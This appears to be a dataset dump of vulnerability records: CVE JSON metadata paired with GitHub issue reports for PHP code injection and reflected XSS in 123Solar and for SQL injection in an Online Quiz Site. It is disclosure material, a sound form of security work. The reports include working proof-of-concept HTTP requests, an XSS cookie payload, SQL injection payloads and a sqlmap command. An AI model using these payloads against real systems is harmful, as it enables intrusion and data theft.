{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/jeanmarc77/123solar/commit/f4a8c748ec436e5a79f91ccb6a6f73752b336aa5" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeanmarc77/123solar/issues/74" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jeanmarc77/123solar/issues/74#issuecomment-2357653441" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.278162" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.278162" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.408298" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeanmarc77:123solar:1.8.4.5:*:*:*:*:*:*:*", "matchCriteriaId": "B96B3FED-CC2C-46C3-8BBE-07E78A555F33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/jeanmarc77/123solar/issues/74#issuecomment-2357653441
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jeanmarc77", "123solar" ]
# Summary > 123Solar is a lightweight set of PHP/JS files that makes a web logger to monitor your photovoltaic inverter(s). It just need a web server and PHP, no databases are even needed. The philosophy is: To keep it simple, fast, with a low foot print to run on cheap and low powered devices. 123Solar 1.8.4.5 contains a PHP Code Injection vulnerability. Attackers can inject arbitrary PHP commands into the `PASSOx` parameter, which can then be executed by other PHP scripts that include `config/config_invt1.php`. # Details In the `/admin/admin_invt2.php` script, the value of the PASSOx parameter is directly written into the `config/config_invt1.php` file without proper filtering or escaping. ![image](https://github.com/user-attachments/assets/3d7ecffa-d8aa-4cc5-bc9f-ca6fdf60973d) This allows attackers to insert PHP code snippets into the PASSOx parameter, which will then be written to the configuration file and executed by other scripts that include this configuration file. ![image](https://github.com/user-attachments/assets/c9e12b19-40c9-4cd9-b7d0-0000091865d3) # POC ``` POST /admin/admin_invt2.php HTTP/1.1 Host: your-ip Content-Length: 843 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: keep-alive INVNAMEx=test&PLANT_POWERx=4600&PHASEx=&CORRECTFACTORx=1&PASSOx=9999999;%0dphpinfo();%0d$test=1&SRx=no&PORTx=%2Fdev%2Fsolar&PROTOCOLx=aurora&ADRx=2&COMOPTIONx=-Y3&SYNCx=true&LOGCOMx=&SKIPMONITORINGx=&YMAXx=4500&YINTERVALx=1000&PANELS1x=10+Aleo+S_18+230W+Orientation%3A+90%C2%B0%2C+Pente%3A+45%C2%B0&PANELS2x=10+Aleo+S_18+230W+Orientation%3A+90%C2%B0%2C+Pente%3A+45%C2%B0&ARRAY1_POWERx=2300&ARRAY2_POWERx=2300&ARRAY3_POWERx=0&ARRAY4_POWERx=0&EXPECTJANx=72.5&EXPECTAPRx=420&EXPECTJUIx=497&EXPECTOCTx=199&EXPECTFEBx=125&EXPECTMAYx=484&EXPECTAUGx=415&EXPECTNOVx=89&EXPECTMARx=288&EXPECTJUNx=495&EXPECTSEPx=313&EXPECTDECx=60.5&EMAILx=&AWPOOLINGx=5&DIGESTMAILx=30&FILTERx=W011%2CW001%2CE011&MAILWx=&SENDALARMSx=true&SENDMSGSx=true&NORESPMx=true&LOGMAWx=&VGRIDUTx=208&VGRIDTx=250&RISOTx=8&ILEAKTx=15&POAKEYx=&POUKEYx=&TLGRTOKx=&TLGRCIDx=0&invt_numx=1 ``` Then visit http://your-ip/admin/admin_invt.php ![image](https://github.com/user-attachments/assets/85b40431-d69e-4b60-9ba7-133ecf010633)
123Solar 1.8.4.5 has a PHP Code Injection vulnerability
https://api.github.com/repos/jeanmarc77/123solar/issues/74/comments
1
2024-09-14T06:19:16Z
2024-09-18T07:00:25Z
https://github.com/jeanmarc77/123solar/issues/74
2,526,023,476
74
6,282
CVE-2024-9007
2024-09-19T23:15:12.830
A vulnerability classified as problematic has been found in jeanmarc77 123solar 1.8.4.5. This affects an unknown part of the file /detailed.php. The manipulation of the argument date1 leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The patch is named 94bf9ab7ad0ccb7fbdc02f172f37f0e2ea08d48f. It is recommended to apply a patch to fix this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/jeanmarc77/123solar/commit/94bf9ab7ad0ccb7fbdc02f172f37f0e2ea08d48f" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jeanmarc77/123solar/issues/73" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jeanmarc77/123solar/issues/73#issuecomment-2357648077" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.278163" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.278163" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.408299" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeanmarc77:123solar:1.8.4.5:*:*:*:*:*:*:*", "matchCriteriaId": "B96B3FED-CC2C-46C3-8BBE-07E78A555F33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jeanmarc77/123solar/issues/73
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jeanmarc77", "123solar" ]
# Summary > 123Solar is a lightweight set of PHP/JS files that makes a web logger to monitor your photovoltaic inverter(s). It just need a web server and PHP, no databases are even needed. The philosophy is: To keep it simple, fast, with a low foot print to run on cheap and low powered devices. A reflected Cross Site Scripting (XSS) vulnerability exists in 123Solar 1.8.4.5 due to improper sanitization of the `$date1` parameter in `detailed.php`. # Details In the provided code, the date1 parameter is passed through a POST request and directly concatenated into JavaScript code on the server-side without proper encoding or escaping. This allows an attacker to inject arbitrary JavaScript code. ``` $date1 = $_POST['date1']; // ... echo "<input name='date1' id='datepickid' value='$date1' size=7 maxlength=10>"; ``` The use of $_POST['date1'] directly in HTML without encoding makes it possible for an attacker to inject any JavaScript code, resulting in a reflected XSS vulnerability. # POC ``` POST /detailed.php HTTP/1.1 Host: 192.168.0.10:1107 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: keep-alive Content-Length: 286 date1=01/01/1967'><script>alert(document.cookie)</script>&checkavgpower=on&checkPROD=on&checkPERF=on&checkIP1=on&checkIV1=on&checkIA1=on&checkPERF1=on&checkIP2=on&checkIV2=on&checkIA2=on&checkPERF2=on&checkG1P=on&checkG1V=on&checkG1A=on&checkFRQ=on&checkINVT=on&checkBOOT=on&checkEFF=on ``` ![image](https://github.com/user-attachments/assets/3a7c91d5-1752-4370-87e6-53269b490b88)
123Solar 1.8.4.5 has a reflected XSS vulnerability
https://api.github.com/repos/jeanmarc77/123solar/issues/73/comments
1
2024-09-14T05:47:09Z
2024-09-18T06:52:59Z
https://github.com/jeanmarc77/123solar/issues/73
2,526,010,847
73
6,283
CVE-2024-9007
2024-09-19T23:15:12.830
A vulnerability classified as problematic has been found in jeanmarc77 123solar 1.8.4.5. This affects an unknown part of the file /detailed.php. The manipulation of the argument date1 leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The patch is named 94bf9ab7ad0ccb7fbdc02f172f37f0e2ea08d48f. It is recommended to apply a patch to fix this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/jeanmarc77/123solar/commit/94bf9ab7ad0ccb7fbdc02f172f37f0e2ea08d48f" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jeanmarc77/123solar/issues/73" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jeanmarc77/123solar/issues/73#issuecomment-2357648077" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.278163" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.278163" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.408299" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeanmarc77:123solar:1.8.4.5:*:*:*:*:*:*:*", "matchCriteriaId": "B96B3FED-CC2C-46C3-8BBE-07E78A555F33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jeanmarc77/123solar/issues/73#issuecomment-2357648077
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jeanmarc77", "123solar" ]
# Summary > 123Solar is a lightweight set of PHP/JS files that makes a web logger to monitor your photovoltaic inverter(s). It just need a web server and PHP, no databases are even needed. The philosophy is: To keep it simple, fast, with a low foot print to run on cheap and low powered devices. A reflected Cross Site Scripting (XSS) vulnerability exists in 123Solar 1.8.4.5 due to improper sanitization of the `$date1` parameter in `detailed.php`. # Details In the provided code, the date1 parameter is passed through a POST request and directly concatenated into JavaScript code on the server-side without proper encoding or escaping. This allows an attacker to inject arbitrary JavaScript code. ``` $date1 = $_POST['date1']; // ... echo "<input name='date1' id='datepickid' value='$date1' size=7 maxlength=10>"; ``` The use of $_POST['date1'] directly in HTML without encoding makes it possible for an attacker to inject any JavaScript code, resulting in a reflected XSS vulnerability. # POC ``` POST /detailed.php HTTP/1.1 Host: 192.168.0.10:1107 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: keep-alive Content-Length: 286 date1=01/01/1967'><script>alert(document.cookie)</script>&checkavgpower=on&checkPROD=on&checkPERF=on&checkIP1=on&checkIV1=on&checkIA1=on&checkPERF1=on&checkIP2=on&checkIV2=on&checkIA2=on&checkPERF2=on&checkG1P=on&checkG1V=on&checkG1A=on&checkFRQ=on&checkINVT=on&checkBOOT=on&checkEFF=on ``` ![image](https://github.com/user-attachments/assets/3a7c91d5-1752-4370-87e6-53269b490b88)
123Solar 1.8.4.5 has a reflected XSS vulnerability
https://api.github.com/repos/jeanmarc77/123solar/issues/73/comments
1
2024-09-14T05:47:09Z
2024-09-18T06:52:59Z
https://github.com/jeanmarc77/123solar/issues/73
2,526,010,847
73
6,284
CVE-2024-9009
2024-09-20T00:15:03.997
A vulnerability, which was classified as critical, has been found in code-projects Online Quiz Site 1.0. This issue affects some unknown processing of the file showtest.php. The manipulation of the argument subid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ZTurNA/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.278165" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.278165" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.410183" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fabianros:online_quiz_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "15DF6E37-6F4D-459A-823E-73DB8450C6CC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ZTurNA/cve/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ZTurNA", "cve" ]
# code-projects Online Quiz Site Using PHP With Source Code v1.0 showtest.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online Quiz Site Using PHP With Source Code ## Vendor Homepage + https://code-projects.org/online-quiz-site-using-php-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + ZTurNA ## Vulnerable File + showtest.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/67670413-e2f8-47a5-87b3-a6a9ecdf8885 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'showtest.php' file of the 'Online Quiz Site Using PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "subid " and use it directly in SQL queries without appropriate cleaning or vasubidation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="717" alt="1" src="https://github.com/user-attachments/assets/abd17ba9-9922-4c01-9d75-b898699a8b47"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input verification for the "subid " parameter, a serious SQL injection vulnerability has been discovered in the "Online Quiz Site Using PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ``` GET /showtest.php?subid=1 HTTP/1.1 Host: 192.168.0.102:1214 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close Referer: http://192.168.0.102:1214/sublist.php Cookie: PHPSESSID=ng2789oib9vsb0mictkp8o643v Upgrade-Insecure-Requests: 1 Priority: u=0, i ``` ## Vulnerability type: + time-based blind + UNION query + boolean-based blind ## Vulnerability location: + 'subid ' parameter ## Payload: ``` Parameter: subid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: subid=1 AND 7447=7447 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: subid=1 AND (SELECT 2864 FROM (SELECT(SLEEP(5)))ZLzn) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: subid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71766a7171,0x67614a667474486c526c48786c71697a6d644b6a5861694b5a665a4f624e436e794e6c5966594967,0x716a627071),NULL-- - ``` <img width="397" alt="2" src="https://github.com/user-attachments/assets/1c5e092e-abeb-4cbb-8cd1-e4f1b30b5385"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="403" alt="3" src="https://github.com/user-attachments/assets/ccda735d-af8f-4a36-a080-323fd275f00f"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input vasubidation and filtering:** Strictly 